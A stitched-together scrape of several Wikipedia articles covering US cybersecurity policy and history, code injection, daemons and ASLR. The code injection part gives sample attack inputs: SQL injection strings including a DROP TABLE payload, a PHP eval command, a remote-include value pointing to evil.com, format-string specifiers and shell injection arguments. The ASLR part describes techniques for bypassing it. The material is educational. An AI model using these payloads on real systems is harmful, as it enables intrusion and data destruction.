U.S.C.§ 1030, theComputer Fraud and Abuse Actis the key legislation. It prohibits unauthorized access or damage ofprotected computersas defined in18 U.S.C.§ 1030(e)(2). Although various other measures have been proposed[250][251]– none have succeeded. In 2013,executive order13636Improving Critical Infrastructure Cybersecuritywas signed, which prompted the creation of theNIST Cybersecurity Framework. In response to theColonial Pipeline ransomware attack[252]PresidentJoe Bidensigned Executive Order 14028[253]on May 12, 2021, to increase software security standards for sales to the government, tighten detection and security on existing systems, improve information sharing and training, establish a Cyber Safety Review Board, and improve incident response. TheGeneral Services Administration(GSA) has[when?]standardized thepenetration testservice as a pre-vetted support service, to rapidly address potential vulnerabilities, and stop adversaries before they impact US federal, state and local governments. These services are commonly referred to as Highly Adaptive Cybersecurity Services (HACS). TheDepartment of Homeland Securityhas a dedicated division responsible for the response system,risk managementprogram and requirements for cybersecurity in the United States called theNational Cyber Security Division.[254][255]The division is home to US-CERT operations and the National Cyber Alert System.[255]The National Cybersecurity and Communications Integration Center brings together government organizations responsible for protecting computer networks and networked infrastructure.[256] The third priority of the FBI is to: "Protect the United States against cyber-based attacks and high-technology crimes",[257]and they, along with theNational White Collar Crime Center(NW3C), and theBureau of Justice Assistance(BJA) are part of the multi-agency task force, TheInternet Crime Complaint Center, also known as IC3.[258] In addition to its own specific duties, the FBI participates alongside non-profit organizations such asInfraGard.[259][260] TheComputer Crime and Intellectual Property Section(CCIPS) operates in theUnited States Department of Justice Criminal Division. The CCIPS is in charge of investigatingcomputer crimeandintellectual propertycrime and is specialized in the search and seizure ofdigital evidencein computers andnetworks.[261]In 2017, CCIPS published A Framework for a Vulnerability Disclosure Program for Online Systems to help organizations "clearly describe authorized vulnerability disclosure and discovery conduct, thereby substantially reducing the likelihood that such described activities will result in a civil or criminal violation of law under the Computer Fraud and Abuse Act (18 U.S.C. § 1030)."[262] TheUnited States Cyber Command, also known as USCYBERCOM, "has the mission to direct, synchronize, and coordinate cyberspace planning and operations to defend and advance national interests in collaboration with domestic and international partners."[263]It has no role in the protection of civilian networks.[264][265] The U.S.Federal Communications Commission's role in cybersecurity is to strengthen the protection of critical communications infrastructure, to assist in maintaining the reliability of networks during disasters, to aid in swift recovery after, and to ensure that first responders have access to effective communications services.[266] TheFood and Drug Administrationhas issued guidance for medical devices,[267]and theNational Highway Traffic Safety Administration[268]is concerned with automotive cybersecurity. After being criticized by theGovernment Accountability Office,[269]and following successful attacks on airports and claimed attacks on airplanes, theFederal Aviation Administrationhas devoted funding to securing systems on board the planes of private manufacturers, and theAircraft Communications Addressing and Reporting System.[270]Concerns have also been raised about the futureNext Generation Air Transportation System.[271] The US Department of Defense (DoD) issued DoD Directive 8570 in 2004, supplemented by DoD Directive 8140, requiring all DoD employees and all DoD contract personnel involved in information assurance roles and activities to earn and maintain various industry Information Technology (IT) certifications in an effort to ensure that all DoD personnel involved in network infrastructure defense have minimum levels of IT industry recognized knowledge, skills and abilities (KSA). Andersson and Reimers (2019) report these certifications range from CompTIA's A+ and Security+ through the ICS2.org's CISSP, etc.[272] Computer emergency response teamis a name given to expert groups that handle computer security incidents. In the US, two distinct organizations exist, although they do work closely together. In the context ofU.S. nuclear power plants, theU.S. Nuclear Regulatory Commission (NRC)outlines cybersecurity requirements under10 CFR Part 73, specifically in §73.54.[274] TheNuclear Energy Institute's NEI 08-09 document,Cyber Security Plan for Nuclear Power Reactors,[275]outlines a comprehensive framework forcybersecurityin thenuclear power industry. Drafted with input from theU.S. NRC, this guideline is instrumental in aidinglicenseesto comply with theCode of Federal Regulations (CFR), which mandates robust protection of digital computers and equipment and communications systems at nuclear power plants against cyber threats.[276] There is growing concern that cyberspace will become the next theater of warfare. As Mark Clayton fromThe Christian Science Monitorwrote in a 2015 article titled "The New Cyber Arms Race": In the future, wars will not just be fought by soldiers with guns or with planes that drop bombs. They will also be fought with the click of a mouse a half a world away that unleashes carefully weaponized computer programs that disrupt or destroy critical industries like utilities, transportation, communications, and energy. Such attacks could also disable military networks that control the movement of troops, the path of jet fighters, the command and control of warships.[277] This has led to new terms such ascyberwarfareandcyberterrorism. TheUnited States Cyber Commandwas created in 2009[278]and many other countrieshave similar forces. There are a few critical voices that question whether cybersecurity is as significant a threat as it is made out to be.[279][280][281] Cybersecurity is a fast-growing field ofITconcerned with reducing organizations' risk of hack or data breaches.[282]According to research from the Enterprise Strategy Group, 46% of organizations say that they have a "problematic shortage" of cybersecurity skills in 2016, up from 28% in 2015.[283]Commercial, government and non-governmental organizations all employ cybersecurity professionals. The fastest increases in demand for cybersecurity workers are in industries managing increasing volumes of consumer data such as finance, health care, and retail.[284]However, the use of the termcybersecurityis more prevalent in government job descriptions.[285] Typical cybersecurity job titles and descriptions include:[286] Student programs are also available for people interested in beginning a career in cybersecurity.[290][291]Meanwhile, a flexible and effective option for information security professionals of all experience levels to keep studying is online security training, including webcasts.[292][293]A wide range of certified courses are also available.[294] In the United Kingdom, a nationwide set of cybersecurity forums, known as theU.K Cyber Security Forum, were established supported by the Government's cybersecurity strategy[295]in order to encourage start-ups and innovation and to address the skills gap[296]identified by theU.K Government. In Singapore, theCyber Security Agencyhas issued a Singapore Operational Technology (OT) Cybersecurity Competency Framework (OTCCF). The framework defines emerging cybersecurity roles in Operational Technology. The OTCCF was endorsed by theInfocomm Media Development Authority(IMDA). It outlines the different OT cybersecurity job positions as well as the technical skills and core competencies necessary. It also depicts the many career paths available, including vertical and lateral advancement opportunities.[297] The following terms used with regards to computer security are explained below: Since theInternet's arrival and with the digital transformation initiated in recent years, the notion of cybersecurity has become a familiar subject in both our professional and personal lives. Cybersecurity and cyber threats have been consistently present for the last 60 years of technological change. In the 1970s and 1980s, computer security was mainly limited toacademiauntil the conception of the Internet, where, with increased connectivity, computer viruses and network intrusions began to take off. After the spread of viruses in the 1990s, the 2000s marked the institutionalization of organized attacks such asdistributed denial of service.[301]This led to the formalization of cybersecurity as a professional discipline.[302] TheApril 1967 sessionorganized byWillis Wareat theSpring Joint Computer Conference, and the later publication of theWare Report, were foundational moments in the history of the field of computer security.[303]Ware's work straddled the intersection of material, cultural, political, and social concerns.[303] A 1977NISTpublication[304]introduced theCIA triadof confidentiality, integrity, and availability as a clear and simple way to describe key security goals.[305]While still relevant, many more elaborate frameworks have since been proposed.[306][307] However, in the 1970s and 1980s, there were no grave computer threats because computers and the internet were still developing, and security threats were easily identifiable. More often, threats came from malicious insiders who gained unauthorized access to sensitive documents and files. Although malware and network breaches existed during the early years, they did not use them for financial gain. By the second half of the 1970s, established computer firms likeIBMstarted offering commercial access control systems and computer security software products.[308] One of the earliest examples of an attack on a computer network was thecomputer wormCreeperwritten by Bob Thomas atBBN, which propagated through theARPANETin 1971.[309]The program was purely experimental in nature and carried no malicious payload. A later program,Reaper, was created byRay Tomlinsonin 1972 and used to destroy Creeper.[citation needed] Between September 1986 and June 1987, a group of German hackers performed the first documented case of cyber espionage.[310]The group hacked into American defense contractors, universities, and military base networks and sold gathered information to the Soviet KGB. The group was led byMarkus Hess, who was arrested on 29 June 1987. He was convicted of espionage (along with two co-conspirators) on 15 Feb 1990. In 1988, one of the first computer worms, called theMorris worm, was distributed via the Internet. It gained significant mainstream media attention.[311] Netscapestarted developing the protocolSSL, shortly after the National Center for Supercomputing Applications (NCSA) launched Mosaic 1.0, the first web browser, in 1993.[312][313]Netscape had SSL version 1.0 ready in 1994, but it was never released to the public due to many serious security vulnerabilities.[312]However, in 1995, Netscape launched Version 2.0.[314] TheNational Security Agency(NSA) is responsible for theprotectionof U.S. information systems and also for collecting foreign intelligence.[315]The agency analyzes commonly used software and system configurations to find security flaws, which it can use for offensive purposes against competitors of the United States.[316] NSA contractors created and soldclick-and-shootattack tools to US agencies and close allies, but eventually, the tools made their way to foreign adversaries.[317]In 2016, NSAs own hacking tools were hacked, and they have been used by Russia and North Korea.[citation needed]NSA's employees and contractors have been recruited at high salaries by adversaries, anxious to compete incyberwarfare.[citation needed]In 2007, the United States andIsraelbegan exploiting security flaws in theMicrosoft Windowsoperating system to attack and damage equipment used in Iran to refine nuclear materials. Iran responded by heavily investing in their own cyberwarfare capability, which it began using against the United States.[316]
https://en.wikipedia.org/wiki/Software_security
Code injectionis acomputer security exploitwhere aprogramfails to correctly process external data, such as user input, causing it to interpret the data as executable commands. Anattackerusing this method "injects"codeinto the program while it is running. Successful exploitation of a code injection vulnerability can result indata breaches, access to restricted or criticalcomputer systems, and the spread ofmalware. Code injectionvulnerabilitiesoccur when an application sends untrusted data to aninterpreter, which then executes the injected text as code. Injection flaws are often found in services like Structured Query Language (SQL) databases, Extensible Markup Language (XML) parsers,operating systemcommands, Simple Mail Transfer Protocol (SMTP) headers, and other programarguments. Injection flaws can be identified throughsource codeexamination,[1]Static analysis, or dynamic testing methods such asfuzzing.[2] There are numerous types of code injection vulnerabilities, but most are errors in interpretation—they treat benign user input as code or fail to distinguish input from system commands. Many examples of interpretation errors can exist outside of computer science, such as the comedy routine"Who's on First?". Code injection can be used maliciously for many purposes, including: Code injections that target theInternet of Thingscould also lead to severe consequences such asdata breachesand service disruption.[3] Code injections can occur on any type of program running with aninterpreter. Doing this is trivial to most, and one of the primary reasons why server software is kept away from users. An example of how you can see code injection first-hand is to use yourbrowser's developer tools. Code injection vulnerabilities are recorded by the National Institute of Standards and Technology(NIST) in the National Vulnerability Database (NVD) asCWE-94. Code injection peaked in 2008 at 5.66% as a percentage of all recorded vulnerabilities.[4] Code injection may be done with good intentions. For example, changing or tweaking the behavior of a program or system through code injection can cause the system to behave in a certain way without malicious intent.[5][6]Code injection could, for example: Some users may unsuspectingly perform code injection because the input they provided to a program was not considered by those who originally developed the system. For example: Another benign use of code injection is the discovery of injection flaws to find and fix vulnerabilities. This is known as apenetration test. To prevent code injection problems, the person could use secure input and output handling strategies, such as: The solutions described above deal primarily with web-based injection of HTML or script code into a server-side application. Other approaches must be taken, however, when dealing with injections of user code on a user-operated machine, which often results in privilege elevation attacks. Some approaches that are used to detect and isolate managed and unmanaged code injections are: AnSQL injectiontakes advantage ofSQL syntaxto inject malicious commands that can read or modify a database or compromise the meaning of the original query.[13] For example, consider a web page that has twotext fieldswhich allow users to enter a username and a password. The code behind the page will generate anSQL queryto check the password against the list of user names: If this query returns any rows, then access is granted. However, if the malicious user enters a valid Username and injects some valid code "('Password' OR '1'='1')in the Password field, then the resulting query will look like this: In the example above, "Password" is assumed to be blank or some innocuous string. "'1'='1'" will always be true and many rows will be returned, thereby allowing access. The technique may be refined to allow multiple statements to run or even to load up and run external programs. Assume a query with the following format: If an adversary has the following for inputs: UserID: ';DROP TABLE User; --' Password: 'OR"=' then the query will be parsed as: The resultingUsertable will be removed from the database. This occurs because the;symbol signifies the end of one command and the start of a new one.--signifies the start of a comment. Code injection is the malicious injection or introduction of code into an application. Someweb servershave aguestbookscript, which accepts small messages from users and typically receives messages such as: However, a malicious person may know of a code injection vulnerability in the guestbook and enter a message such as: If another user views the page, then the injected code will be executed. This code can allow the attacker to impersonate another user. However, this same software bug can be accidentally triggered by an unassuming user, which will cause the website to display bad HTML code. HTML and script injection are popular subjects, commonly termed "cross-site scripting" or "XSS". XSS refers to an injection flaw whereby user input to a web script or something along such lines is placed into the output HTML without being checked for HTML code or scripting. Many of these problems are related to erroneous assumptions of what input data is possible or the effects of special data.[14] Template enginesare often used in modernweb applicationsto display dynamic data. However, trusting non-validated user data can frequently lead to critical vulnerabilities[15]such as server-side Side Template Injections. While this vulnerability is similar tocross-site scripting, template injection can be leveraged to execute code on the web server rather than in a visitor's browser. It abuses a common workflow of web applications, which often use user inputs and templates to render a web page. The example below shows the concept. Here the template{{visitor_name}}is replaced with data during the rendering process. An attacker can use this workflow to inject code into the rendering pipeline by providing a maliciousvisitor_name. Depending on the implementation of the web application, he could choose to inject{{7*'7'}}which the renderer could resolve toHello 7777777. Note that the actual web server has evaluated the malicious code and therefore could be vulnerable toremote code execution. Aneval()injection vulnerability occurs when an attacker can control all or part of an input string that is fed into aneval()function call.[16] The argument of "eval" will be processed asPHP, so additional commands can be appended. For example, if "arg" is set to "10;system('/bin/echo uh-oh')", additional code is run which executes a program on the server, in this case "/bin/echo". PHP allowsserializationanddeserializationof wholeobjects. If an untrusted input is allowed into the deserialization function, it is possible to overwrite existing classes in the program and execute malicious attacks.[17]Such an attack onJoomlawas found in 2013.[18] Consider thisPHPprogram (which includes a file specified by request): The example expects a color to be provided, while attackers might provideCOLOR=http://evil.com/exploitcausing PHP to load the remote file. Format string bugs appear most commonly when a programmer wishes to print a string containing user-supplied data. The programmer may mistakenly writeprintf(buffer)instead ofprintf("%s", buffer). The first version interpretsbufferas a format string and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended. Consider the following shortCprogram that has a local variable chararraypasswordwhich holds a password; the program asks the user for an integer and a string, then echoes out the user-provided string. If the user input is filled with a list of format specifiers, such as%s%s%s%s%s%s%s%s, thenprintf()will start reading from thestack. Eventually, one of the%sformat specifiers will access the address ofpassword, which is on the stack, and printPassword1to the screen. Shell injection (or command injection[19][unreliable source?]) is named afterUNIXshells but applies to most systems that allow software to programmatically execute acommand line. Here is an example vulnerabletcshscript: If the above is stored in the executable file./check, the shell command./check " 1 ) evil"will attempt to execute the injected shell commandevilinstead of comparing the argument with the constant one. Here, the code under attack is the code that is trying to check the parameter, the very code that might have been trying to validate the parameter to defend against an attack.[20] Any function that can be used to compose and run a shell command is a potential vehicle for launching a shell injection attack. Among these aresystem(),StartProcess(), andSystem.Diagnostics.Process.Start(). Client-serversystems such asweb browserinteraction withweb serversare potentially vulnerable to shell injection. Consider the following short PHP program that can run on a web server to run an external program calledfunnytextto replace a word the user sent with some other word. Thepassthrufunction in the above program composes a shell command that is then executed by the web server. Since part of the command it composes is taken from theURLprovided by the web browser, this allows theURLto inject malicious shell commands. One can inject code into this program in several ways by exploiting the syntax of various shell features (this list is not exhaustive):[21] Some languages offer functions to properly escape or quote strings that are used to construct shell commands: However, this still puts the burden on programmers to know/learn about these functions and to remember to make use of them every time they use shell commands. In addition to using these functions, validating or sanitizing the user input is also recommended. A safer alternative is to useAPIsthat execute external programs directly rather than through a shell, thus preventing the possibility of shell injection. However, theseAPIstend to not support various convenience features of shells and/or to be more cumbersome/verbose compared to concise shell syntax.
https://en.wikipedia.org/wiki/Command_injection
Inmultitaskingcomputeroperating systems, adaemon(/ˈdiːmən/or/ˈdeɪmən/)[1]is acomputer programthat runs as abackground process, rather than being under the direct control of an interactive user. Traditionally, the process names of a daemon end with the letterd, for clarification that the process is in fact a daemon, and for differentiation between a daemon and a normal computer program. For example,syslogdis a daemon that implements system logging facility, andsshdis a daemon that serves incomingSSHconnections. In aUnixenvironment, theparent processof a daemon is often, but not always, theinitprocess. A daemon is usually created either by a processforkinga child process and then immediately exiting, thus causing init to adopt the child process, or by the init process directly launching the daemon. In addition, a daemon launched by forking and exiting typically must perform other operations, such as dissociating the process from any controllingterminal(tty). Such procedures are often implemented in various convenience routines such asdaemon(3)in Unix. Systems often start daemons atboottime that will respond to network requests, hardware activity, or other programs by performing some task. Daemons such ascronmay also perform defined tasks at scheduled times. The term was coined by the programmers atMIT's Project MAC. According toFernando J. Corbató, who worked onProject MACaround 1963, his team was the first to use the term daemon, inspired byMaxwell's demon, an imaginary agent in physics andthermodynamicsthat helped to sort molecules, stating, "We fancifully began to use the word daemon to describe background processes that worked tirelessly to perform system chores".[2]Unixsystems inherited this terminology. Maxwell's demon is consistent with Greek mythology's interpretation of adaemonas a supernatural being working in the background. In the general sense, daemon is an older form of the word "demon", from theGreekδαίμων. In theUnix System Administration HandbookEvi Nemethstates the following about daemons:[3] Many people equate the word "daemon" with the word "demon", implying some kind ofsatanicconnection between UNIX and theunderworld. This is an egregious misunderstanding. "Daemon" is actually a much older form of "demon"; daemons have no particular bias towards good or evil, but rather serve to help define a person's character or personality. Theancient Greeks' concept of a "personal daemon" was similar to the modern concept of a "guardian angel"—eudaemoniais the state of being helped or protected by a kindly spirit. As a rule, UNIX systems seem to be infested with both daemons and demons. In modern usage in the context of computer software, the worddaemonis pronounced/ˈdiːmən/DEE-mənor/ˈdeɪmən/DAY-mən.[1] Alternative terms fordaemonareservice(used in Windows, from Windows NT onwards, and later also in Linux),started task(IBMz/OS),[4]andghost job(XDSUTS). Sometimes the more general termserverorserver processis used, particularly for daemons that operate as part ofclient-server systems.[5] After the term was adopted for computer use, it was rationalized as abackronymfor Disk And Execution MONitor.[6][1] Daemons that connect to a computer network are examples ofnetwork services. In a strictly technical sense, a Unix-like system process is a daemon when its parent process terminates and the daemon is assigned theinitprocess (process number 1) as its parent process and has no controlling terminal. However, more generally, a daemon may be any background process, whether a child of the init process or not. On a Unix-like system, the common method for a process to become a daemon, when the process is started from thecommand lineor from a startup script such as aninitscript or aSystemStarterscript, involves: If the process is started by asuper-serverdaemon, such asinetd,launchd, orsystemd, the super-server daemon will perform those functions for the process,[7][8][9]except for old-style daemons not converted to run undersystemdand specified asType=forking[9]and "multi-threaded" datagram servers underinetd.[7] In theMicrosoft DOSenvironment, daemon-like programs were implemented asterminate-and-stay-resident programs(TSR). OnMicrosoft Windows NTsystems, programs calledWindows servicesperform the functions of daemons. They run as processes, usually do not interact with the monitor, keyboard, and mouse, and may be launched by the operating system at boot time. InWindows 2000and later versions, Windows services are configured and manually started and stopped using theControl Panel, a dedicated control/configuration program, the Service Controller component of theService Control Manager(sccommand), thenet startandnet stopcommands or thePowerShellscripting system. However, any Windows application can perform the role of a daemon, not just a service, and some Windows daemons have the option of running as a normal process. On theclassic Mac OS, optional features and services were provided by files loaded at startup time that patched the operating system; these were known assystem extensionsandcontrol panels. Later versions of classic Mac OS augmented these with fully fledgedfaceless background applications: regular applications that ran in the background. To the user, these were still described as regular system extensions. macOS, which is aUnixsystem, uses daemons but uses the term "services" to designate software that performs functions selected from theServices menu, rather than using that term for daemons, as Windows does.
https://en.wikipedia.org/wiki/Daemon_(computing)
Address space layout randomization(ASLR) is acomputer securitytechnique involved in preventingexploitationofmemory corruptionvulnerabilities.[1]In order to prevent an attacker from reliably redirecting code execution to, for example, a particular exploited function in memory, ASLR randomly arranges theaddress spacepositions of key data areas of aprocess, including the base of theexecutableand the positions of thestack,heapandlibraries. When applied to the kernel, this technique is calledkernel address space layout randomization(KASLR).[2] The LinuxPaXproject first coined the term "ASLR", and published the first design andimplementation of ASLRin July 2001 as apatchfor theLinux kernel. It is seen as a complete implementation, providing a patch for kernel stack randomization since October 2002.[3] The first mainstream operating system to support ASLR by default wasOpenBSDversion3.4in 2003,[4][5]followed by Linux in 2005. Address space randomization hinders some types of security attacks by making it more difficult for an attacker to predict target addresses. For example, attackers trying to executereturn-to-libc attacksmust locate the code to be executed, while other attackers trying to executeshellcodeinjected on the stack have to find the stack first. In both cases, the system makes related memory-addresses unpredictable from the attackers' point of view. These values have to be guessed, and a mistaken guess is not usually recoverable due to the application crashing. Address space layout randomization is based upon the low chance of an attacker guessing the locations of randomly placed areas. Security is increased by increasing the search space. Thus, address space randomization is more effective when moreentropyis present in the random offsets. Entropy is increased by either raising the amount ofvirtual memoryarea space over which the randomization occurs or reducing the period over which the randomization occurs. The period is typically implemented as small as possible, so most systems must increase VMA space randomization. To defeat the randomization, attackers must successfully guess the positions of all areas they wish to attack. For data areas such as stack and heap, where custom code or useful data can be loaded, more than one state can be attacked by usingNOP slidesfor code or repeated copies of data. This allows an attack to succeed if the area is randomized to one of a handful of values. In contrast, code areas such as library base and main executable need to be discovered exactly. Often these areas are mixed, for examplestack framesare injected onto the stack and a library is returned into. The following variables can be declared: To calculate the probability of an attacker succeeding, a number of attemptsαcarried out without being interrupted by a signature-based IPS, law enforcement, or other factor must be assumed; in the case of brute forcing, the daemon cannot be restarted. The number of relevant bits and how many are being attacked in each attempt must also be calculated, leaving however many bits the attacker has to defeat. The following formulas represent the probability of success for a given set ofαattempts onNbits of entropy. In many systems,2N{\displaystyle 2^{N}}can be in the thousands or millions. On 32-bit systems, a typical amount of entropyNis 8 bits.[6]For 2004 computer speeds, Shacham and co-workers state "... 16 bits of address randomization can be defeated by abrute force attackwithin minutes."[7](The authors' statement depends on the ability to attack the same application multiple times without any delay. Proper implementations of ASLR, like that included in grsecurity, provide several methods to make such brute force attacks infeasible. One method involves preventing an executable from executing for a configurable amount of time if it has crashed a certain number of times.) On modern[update]64-bitsystems, these numbers typically reach the millions at least.[citation needed] Android,[8][non-primary source needed]and possibly other systems,[which?]implementLibrary Load Order Randomization, a form of ASLR which randomizes the order in which libraries are loaded. This supplies very little entropy. An approximation of the number of bits of entropy supplied per needed library appears below; this does not yet account for varied library sizes, so the actual entropy gained is really somewhat higher. Attackers usually need only one library; the math is more complex with multiple libraries, and shown below as well. The case of an attacker using only one library is a simplification of the more complex formula forl=1{\displaystyle l=1}. These values tend to be low even for large values ofl, most importantly since attackers typically can use only theC standard libraryand thus one can often assume thatβ=1{\displaystyle \beta \,=1}. However, even for a small number of libraries there are a few bits of entropy gained here; it is thus potentially interesting to combine library load order randomization with VMA address randomization to gain a few extra bits of entropy. These extra bits of entropy will not apply to other mmap() segments, only libraries. Attackers may make use of several methods to reduce the entropy present in a randomized address space, ranging from simple information leaks to attacking multiple bits of entropy per attack (such as byheap spraying). There is little that can be done about this. It is possible to leak information about memory layout usingformat string vulnerabilities. Format string functions such asprintfuse avariable argument listto do their job; format specifiers describe what the argument list looks like. Because of the way arguments are typically passed, each format specifier moves closer to the top of the stack frame. Eventually, the return pointer and stack frame pointer can be extracted, revealing the address of a vulnerable library and the address of a known stack frame; this can eliminate library and stack randomization as an obstacle to an attacker. One can also decrease entropy in the stack or heap. The stack typically must be aligned to 16 bytes, and so this is the smallest possible randomization interval; while the heap must be page-aligned, typically 4096 bytes. When attempting an attack, it is possible to align duplicate attacks with these intervals; aNOP slidemay be used withshellcode injection, and the string '/bin/sh' can be replaced with '////////bin/sh' for an arbitrary number of slashes when attempting to return tosystem. The number of bits removed is exactlylog2(n){\displaystyle \log _{2}\!\left(n\right)}fornintervals attacked. Such decreases are limited due to the amount of data in the stack or heap. The stack, for example, is typically limited to8MB[9]and grows to much less; this allows for at most19 bits, although a more conservative estimate would be around 8–10 bitscorresponding to 4–16KB[9]of stack stuffing. The heap on the other hand is limited by the behavior of the memory allocator; in the case ofglibc, allocations above 128 KB are created usingmmap, limiting attackers to 5 bits of reduction. This is also a limiting factor when brute forcing; although the number of attacks to perform can be reduced, the size of the attacks is increased enough that the behavior could in some circumstances become apparent tointrusion detection systems. ASLR-protected addresses can be leaked by various side channels, removing mitigation utility. Recent attacks have used information leaked by the CPU branch target predictor buffer (BTB) or memory management unit (MMU) walking page tables. It is not clear if this class of ASLR attack can be mitigated. If they cannot, the benefit of ASLR is reduced or eliminated. In August 2024 a paper[10]was published with an empirical analysis of major desktop platforms, including Linux, macOS, and Windows, by examining the variability in the placement of memory objects across various processes, threads, and system restarts. The results show that while some systems as of 2024, like Linux distributions, provide robust randomization, others, like Windows and macOS, often fail to adequately randomize key areas like executable code and libraries. Moreover, they found a significant entropy reduction in the entropy of libraries after the Linux 5.18 version and identify correlation paths that an attacker could leverage to reduce exploitation complexity significantly. Several mainstream, general-purpose operating systems implement ASLR. Android4.0 Ice Cream Sandwich provides address space layout randomization (ASLR) to help protect system and third-party applications from exploits due to memory-management issues. Position-independent executable support was added in Android 4.1.[11]Android 5.0 dropped non-PIE support and requires all dynamically linked binaries to be position independent.[12][13]Library load ordering randomization was accepted into the Android open-source project on 26 October 2015,[8][non-primary source needed]and was included in the Android 7.0 release. DragonFly BSDhas an implementation of ASLR based upon OpenBSD's model, added in 2010.[14]It is off by default, and can be enabled by setting the sysctl vm.randomize_mmap to 1. Support for ASLR appeared inFreeBSD13.0.[15][16]It is enabled by default since 13.2.[17] Appleintroduced ASLR iniOS4.3 (released March 2011).[18] KASLR was introduced in iOS 6.[19]The randomized kernel base is0x01000000 + ((1+0xRR) * 0x00200000), where0xRRis a random byte from SHA1 (random data) generated by iBoot (the 2nd-stage iOS Boot Loader).[20] TheLinux kernelenabled a weak form of ASLR by default since the kernel version 2.6.12, released in June 2005.[21]ThePaXandExec Shieldpatchsets to the Linux kernel provide more complete implementations. The Exec Shield patch forLinuxsupplies 19 bits of stack entropy on a period of 16 bytes, and 8 bits of mmap base randomization on a period of 1 page of 4096 bytes. This places the stack base in an area 8 MB wide containing 524,288 possible positions, and the mmap base in an area 1 MB wide containing 256 possible positions. ASLR can be disabled for a specific process by changing its execution domain, usingpersonality(2).[22]A number ofsysctloptions control the behavior of mainline ASLR. For example,kernel.randomize_va_spacecontrolswhatto randomize; the strongest option is 2.vm.mmap_rnd_bitscontrols how many bits to randomize formmap.[23] Position-independent executable(PIE) implements a random base address for the main executable binary and has been in place since April 18, 2004. It provides the same address randomness to the main executable as being used for the shared libraries. The PIE feature cannot be used together with theprelinkfeature for the same executable. The prelink tool implements randomization at prelink time rather than runtime, because by design prelink aims to handle relocating libraries before the dynamic linker has to, which allows the relocation to occur once for many runs of the program. As a result, real address space randomization would defeat the purpose of prelinking. In 2014, Marco-Gisbert and Ripoll disclosedoffset2libtechnique that weakens Linux ASLR for PIE executables. Linux kernels load PIE executables right after their libraries; as a result, there is a fixed offset between the executable and the library functions. If an attacker finds a way to find the address of a function in the executable, the library addresses are also known. They demonstrated an attack that finds the address in fewer than 400 tries. They proposed a newrandomize_va_space=3option to randomize the placement of the executable relative to the library,[6]but it is yet to be incorporated into the upstream as of 2024.[24] The Linux kernel 5.18 released May 2022 reduced the effectiveness of both 32-bit and 64-bit implementations. Linux filesystems callthp_get_unmapped_areato respond to a file-backedmmap. With a change in 5.18, files greater than 2 MiB are made to return 2 MiB-aligned addresses, so they can be potentially backed byhuge pages. (Previously, the increased alignment only applied to Direct Access (DAX) mappings.) In the meantime, the C library (libc) has, over time, grown in size to exceed this 2 MiB threshold, so instead of being aligned to a (typically) 4 KiB page boundary as before, these libraries are now 2 MiB-aligned: a loss of 9 bits of entropy. For 32-bit Linux, many distributions show no randomizationat allin the placement of the libc. For 64-bit Linux, the 28 bits of entropy is reduced to 19 bits. In response, Ubuntu has increased itsmmap_rnd_bitssetting.[25]Martin Doucha added aLinux Test Projecttestcase to detect this issue.[26] Kernel address space layout randomization (KASLR) enables address space randomization for the Linux kernel image by randomizing where the kernel code is placed at boot time.[27]KASLR was merged into theLinux kernel mainlinein kernel version 3.14, released on 30 March 2014.[28]When compiled in, it can be disabled at boot time by specifyingnokaslras one of the kernel's boot parameters.[29] There are severalside-channel attacksin x86 processors that could leak kernel addresses.[30][31]In late 2017,kernel page-table isolation(KPTI aka KAISER) was developed to defeat these attacks.[32][33]However, this method cannot protect against side-channel attacks utilizing collisions inbranch predictorstructures.[34] As of 2021[update], finer grained kernel address space layout randomization (or function granular KASLR, FGKASLR) is a planned extension of KASLR to randomize down to the function level by placing functions in separate sections and reordering them at boot time.[35] Microsoft'sWindows Vista(released January 2007) and later have ASLR enabled only for executables anddynamic link librariesthat are specifically linked to be ASLR-enabled.[36]For compatibility, it is not enabled by default for other applications. Typically, only older software is incompatible and ASLR can be fully enabled by editing a registry entryHKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages,[37]or by installing Microsoft'sEnhanced Mitigation Experience Toolkit. The locations of theheap,stack, Process Environment Block, andThread Environment Blockare also randomized. A security whitepaper from Symantec noted that ASLR in 32-bit Windows Vista may not be as robust as expected, and Microsoft has acknowledged a weakness in its implementation.[38] Host-basedintrusion prevention systemssuch asWehnTrust[39]andOzone[40]also offer ASLR forWindows XPandWindows Server 2003operating systems. WehnTrust is open-source.[41]Complete details of Ozone's implementation are not available.[42] It was noted in February 2012[43]that ASLR on 32-bit Windows systems prior toWindows 8can have its effectiveness reduced in low memory situations. A similar effect also had been achieved on Linux in the same research. The test code caused the Mac OS X 10.7.3 system tokernel panic, so it was left unclear about its ASLR behavior in this scenario. Support for ASLR in userland appeared inNetBSD5.0 (released April 2009),[44]and was enabled by default in NetBSD-current in April 2016.[45] Kernel ASLR support on amd64 was added in NetBSD-current in October 2017, making NetBSD the first BSD system to support KASLR.[46] In 2003,OpenBSDbecame the first mainstream operating system to support a strong form of ASLR and to activate it by default.[4]OpenBSD completed its ASLR support in 2008 when it added support forPIEbinaries.[47]OpenBSD 4.4'smalloc(3)was designed to improve security by taking advantage of ASLR and gap page features implemented as part of OpenBSD'smmapsystem call, and to detect use-after-free bugs.[48]Released in 2013, OpenBSD 5.3 was the first mainstream operating system to enable position-independent executables by default on multiplehardware platforms, and OpenBSD 5.7 activated position-independent static binaries (Static-PIE) by default.[47] InMac OS X Leopard10.5 (released October 2007), Apple introduced randomization for system libraries.[49] InMac OS X Lion10.7 (released July 2011), Apple expanded their implementation to cover all applications, stating "address space layout randomization (ASLR) has been improved for all applications. It is now available for 32-bit apps (as are heap memory protections), making 64-bit and 32-bit applications more resistant to attack."[50] As ofOS X Mountain Lion10.8 (released July 2012) and later, the entire system including the kernel as well askextsand zones are randomly relocated during system boot.[51] ASLR has been introduced inSolarisbeginning with Solaris 11.1 (released October 2012). ASLR in Solaris 11.1 can be set system-wide, per zone, or on a per-binary basis.[52] Aside-channel attackutilizingbranch target bufferwas demonstrated to bypass ASLR protection.[34]In 2017, an attack named "ASLR⊕Cache" was demonstrated which could defeat ASLR in a web browser using JavaScript.[53]
https://en.wikipedia.org/wiki/Address_space_layout_randomization
